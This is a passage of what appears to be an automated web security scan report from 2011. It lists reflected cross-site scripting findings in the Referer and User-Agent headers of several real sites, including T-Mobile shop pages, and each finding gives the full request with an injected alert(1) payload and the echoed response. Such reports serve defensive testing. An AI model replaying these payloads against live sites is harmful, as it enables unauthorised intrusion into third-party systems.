This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 8abfc<script>alert(1)</script>aa9ece6f440
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=11; BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=isN6iiVsW5zFhVmEhp3wvBQNQb1MaQBj6W9sWr87GbT1F2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQisnPXWDFClGD2H0Stu1ELhpOip8NLReVQ9cii8xtm6s0Hip0A8TiitEcowvl4NsnRGPKtcii8xtm6s0HwdXOwip1B1nCe8JGn3rPyXs2c5lEROZWfhbXWlHDeTJtquuHipMoh9RTR6U8NLisaC7ORPZ6qGWYkQZMkXjY8SZILisX2addMa3SpIqgipisdqQYmp4iiY59yUYL0zyiscBAuipHM1ExkNK7HUtFQY8D8EoTSfaf7iipmAlmIZAYrZFK915QPQY8D8EoTSfbG63WARr9y0IvMxx19o1g1o7nMpzq3kfdD2SUwv3QakrzTEr2vlOkJ4D6pmkisCMqcAzum6zEgp6XGo5ipCCle7RZIUyeD671isAw4MKsiiCZYstRkVjWishJC0gucyDYser1fdsnRGwuisv9jrqxbyIfV5JX6trrRJipuQVyw5x4tgvvEAmKNipOjaZe4TYQipIlZ3ylJisYOGYzBE9ofsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhR9a9kO3kWhZdisavH5YaCJ5rUWjQzHYzuE5F8MIo6TFZwXlJpOhLiizNpNr6IkhgpAMODCrIgmWLJQBrVq3qQ1x0fOfkii7hvjhMODCrIgmWLJd5PYHQOnIlphDis4W2NxC5ii8wm47VZdipzGjg3vXDjpIoXTCip3pWZHdDgudjw9mFhqjE5cmLaumWvPisuMBdYGnNjFKkiifXjBxrDCe4W2moTMBkU3ztEG5cdSFEnkb4zys7dsnRGwuisv9s0isadgqzolKiiGTEbnCgyE1cii8xtm6s0H62f9zbDfGLCNDknU2KiiK5XJZXKAa9DdLgeLHSyEVCqewehdQ95muediiOubPaoV2GOSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspDrlNVQ5pXipFqPldy6c1wwH4DELwm2ipwNTWf9VC0MxLPTbwiiAhQOisLVKYdIhNR58XPyXdljTHnfzipb2oENiijskVSyOgJ4DcQ5edL23LzEBHTPBC90eHipCeVH8XNipcUA3d6nxb7Y0jHGaJiscreecN0ziiMENE8hb9sxipRPP7waXBw5lp0goYX9K7jdZVWdE1d63tNNKpPRTfwMQqDyBpTexjvLSfG0NTggQisBis0pCAWoAbL7XvSbTbMY6Ieq2OBIPZG9mAlnvY8niieUipd4xQFIMQ7ehpLrwT8iiuaxkLxWAAQVxxRbeRNLwnxEF0959EwhxcAYMQm1wy5m7EDaANucbTBLcziplMN7DjmeRlE5k9TOFLeZzxcHjVQX6FvC2QlLeG1tBOXsjWJGU6RQpSM5WNTMSIVyQOSx97NRNJpDJ16j2O6jcjBhYz1yXsZu82jLlm5f2DhmMwRPaEip1TDoODPXCk2EPiiJWd8pSf2DhmMwRPaEEyVWdZkawipgieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 23 Mar 2011 19:41:37 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 8abfc<script>alert(1)</script>aa9ece6f440

1.250. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/adServerESI.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eac83"-alert(1)-"293bb11036e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /adServer/adServerESI.aspx?bannerID=173670 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: eac83"-alert(1)-"293bb11036e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=216a3151297859685; IXAIBannerCounter174466=1; IXAIFirstHit2457=2%2f16%2f2011+7%3a07%3a58+AM; IXAIBanners2251=171021; IXAIBannerCounter171021=1; IXAIFirstHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAILastHit2251=2%2f16%2f2011+8%3a18%3a55+AM; IXAICampaignCounter2251=1; IXAIBanners2357=173404; IXAIBannerCounter173404=1; IXAIFirstHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAILastHit2357=2%2f28%2f2011+8%3a17%3a22+AM; IXAICampaignCounter2357=1; IXAIBanners2457=174466,175106,175106,175106; IXAIBannerCounter175106=3; IXAILastHit2457=3%2f7%2f2011+7%3a51%3a59+AM; IXAICampaignCounter2457=4; IXAIFirstHit2411=3%2f10%2f2011+11%3a08%3a04+AM; IXAIBanners2411=174145,174145,174145; IXAIBannerCounter174145=3; IXAILastHit2411=3%2f10%2f2011+11%3a29%3a10+AM; IXAICampaignCounter2411=3; IXAIBanners2528=174753; IXAIBannerCounter174753=1; IXAIFirstHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAILastHit2528=3%2f10%2f2011+6%3a09%3a23+PM; IXAICampaignCounter2528=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Length: 541
Content-Type: text/javascript; charset=utf-8
Set-Cookie: IXAIBanners2399=173670; domain=.insightexpressai.com; expires=Wed, 23-Mar-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIBannerCounter173670=1; domain=.insightexpressai.com; expires=Wed, 23-Mar-2016 12:00:00 GMT; path=/
Set-Cookie: IXAIFirstHit2399=3%2f23%2f2011+2%3a40%3a24+PM; domain=.insightexpressai.com; expires=Wed, 23-Mar-2016 12:00:00 GMT; path=/
Set-Cookie: IXAILastHit2399=3%2f23%2f2011+2%3a40%3a24+PM; domain=.insightexpressai.com; expires=Wed, 23-Mar-2016 12:00:00 GMT; path=/
Set-Cookie: IXAICampaignCounter2399=1; domain=.insightexpressai.com; expires=Wed, 23-Mar-2016 12:00:00 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Vary: Accept-Encoding
Expires: Wed, 23 Mar 2011 19:41:21 GMT
Pragma: no-cache
Date: Wed, 23 Mar 2011 19:41:21 GMT
Connection: close
Cache-Control: no-store


function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;}
function IX_InvitePerformed(){if (typeof(window.siteInvited)=='f
...[SNIP]...
InviteAllowed()){IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=173670&referer=eac83"-alert(1)-"293bb11036e";document.getElementsByTagName('head')[0].appendChild(s);}})();

1.251. http://melges32.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://melges32.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 44972--><script>alert(1)</script>9f2757208e6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: melges32.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.1644972--><script>alert(1)</script>9f2757208e6
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=255129108.1299711294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1299711294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=255129108.350933685.1299711294.1299711294.1299711294.1; __utma=1.1249062043.1299711294.1299711294.1299711294.1

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Tue, 22 Mar 2011 22:00:49 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-edafcnem=2CE5192D874689792099349D1DF9CBA0; path=/
Content-Length: 21339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us">
<head profile="http
...[SNIP]...
<!-- USER AGENT |Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.1644972--><script>alert(1)</script>9f2757208e6| -->
...[SNIP]...

1.252. http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /shop/Phones/cell-phone-detail.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bf0b'-alert(1)-'393755e47 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/Phones/cell-phone-detail.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8bf0b'-alert(1)-'393755e47
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=lcfxjinr3kgmb2q5tvnilh55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lcfxjinr3kgmb2q5tvnilh55; path=/; HttpOnly
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=ZIPISVALID=True&UCCID=U&SessionId=c9f85933-6ef4-4f4b-b001-29f4f8873973&WT=&DCS=; domain=.t-mobile.com; path=/
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a12%3a32+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:12:32 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:12:32 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:12:32 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Set-Cookie: TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$; domain=.t-mobile.com; expires=Tue, 22-Mar-2011 22:17:32 GMT; path=/
Date: Tue, 22 Mar 2011 22:12:32 GMT
Connection: close
Content-Length: 287631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8bf0b'-alert(1)-'393755e47');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.253. http://www.t-mobile.com/shop/addons/Accessories/Default.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /shop/addons/Accessories/Default.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d519e'-alert(1)-'b8236254b89 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/addons/Accessories/Default.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d519e'-alert(1)-'b8236254b89
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=xfdhbkipwl100irfzpuppjy0; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xfdhbkipwl100irfzpuppjy0; path=/; HttpOnly
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=ZIPISVALID=True&SELECTEDDEVICE=00000000-0000-0000-0000-000000000000&WT=&DCS=; domain=.t-mobile.com; path=/
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a09%3a35+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:09:35 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:09:35 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:09:35 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Date: Tue, 22 Mar 2011 22:09:34 GMT
Connection: close
Content-Length: 94067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d519e'-alert(1)-'b8236254b89');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.254. http://www.t-mobile.com/shop/addons/Services/information.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /shop/addons/Services/information.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f07e'-alert(1)-'937f8744d7f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/addons/Services/information.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f07e'-alert(1)-'937f8744d7f
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=41obck555okwei3op1upsk55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=41obck555okwei3op1upsk55; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a10%3a35+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:10:35 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:10:35 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:10:35 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 22 Mar 2011 22:10:35 GMT
Connection: close
Content-Length: 55226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2f07e'-alert(1)-'937f8744d7f');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.255. http://www.t-mobile.com/shop/phones/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /shop/phones/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d7e1'-alert(1)-'c5a9c67a6be was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/phones/ HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5d7e1'-alert(1)-'c5a9c67a6be
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ciwdgmifoh1tpy2g5qg1djzx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ciwdgmifoh1tpy2g5qg1djzx; path=/; HttpOnly
Set-Cookie: TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; domain=.t-mobile.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: TMobileSession=ZIPISVALID=True&UCCID=U&SessionId=b48d5366-82bb-4886-8b4a-6b8f48747ae8&WT=&DCS=; domain=.t-mobile.com; path=/
Set-Cookie: PartnerExpiration=PARTNER=!4%2f5%2f2011+10%3a12%3a09+PM; domain=.t-mobile.com; expires=Thu, 22-Mar-2012 22:12:09 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:12:09 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 22-Mar-2006 22:12:09 GMT; path=/
Set-Cookie: TMobileGeo=UserCurrentLocation=75207&UserCurrentCity=Dallas&UserCurrentCountry=United+States&GeoMarketId=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&NeighborhoodName=Dallas&StateAbbreviation=TX&GeoMarketCode=DAT; domain=.t-mobile.com; path=/
Set-Cookie: TMobileShop=manufacturerCookie=&typeCookie=&priceRangeCookie=&featureCookie=&pageIndexCookie=1&phoneHeaderCookie=$; domain=.t-mobile.com; expires=Tue, 22-Mar-2011 22:17:09 GMT; path=/
Date: Tue, 22 Mar 2011 22:12:09 GMT
Connection: close
Content-Length: 287632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
'true');
lpAddVars('session','LPTMOExistingcustomer', 'false');
lpAddVars('session','LPTMOmarketCode', 'DAT');
lpAddVars('session','LPTMObrowser', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5d7e1'-alert(1)-'c5a9c67a6be');
lpAddVars('page','LPTMOIsSpanishUser', 'false');
lpAddVars('page','LPTMOzipcode', '75207');
</script>
...[SNIP]...

1.256. http://www.t-mobile.com/shop/phones/Default.aspx [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /shop/phones/Default.aspx

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b641'-alert(1)-'f75c093fa1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /shop/phones/Default.aspx HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8b641'-alert(1)-'f75c093fa1
Connection: close
Cookie: TMobileSpanish=IsSpanishUser=false; WT_FPC=id=10.134.111.248-1143909120.30140155:lv=1300618046267:ss=1300616298452; TMobileUSStore=MarketUniqueID=8eb5dca0-f21b-4b24-8dc8-49933c6ff5d3&MarketCode=DAT&NeighborhoodName=Dallas&StateAbbreviation=TX&CityName=Dallas&StateName=Texas&ZIP=75207; TMobileCommon=TeaId=e58e0348-61c2-4256-a2fc-c461eaa48b39; 53643872-VID=44502044936234; TMobileSegmentation=UserId=182ea6ae-2179-409b-9a61-125b87fb8307; mr_referredVisitor=0; mbox=PC#1300624507874-511379.17#1301838444|session#1300627094627-816279#1300630704|check#true#1300628904|behaveSegmentCookie#phones#1332164809;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
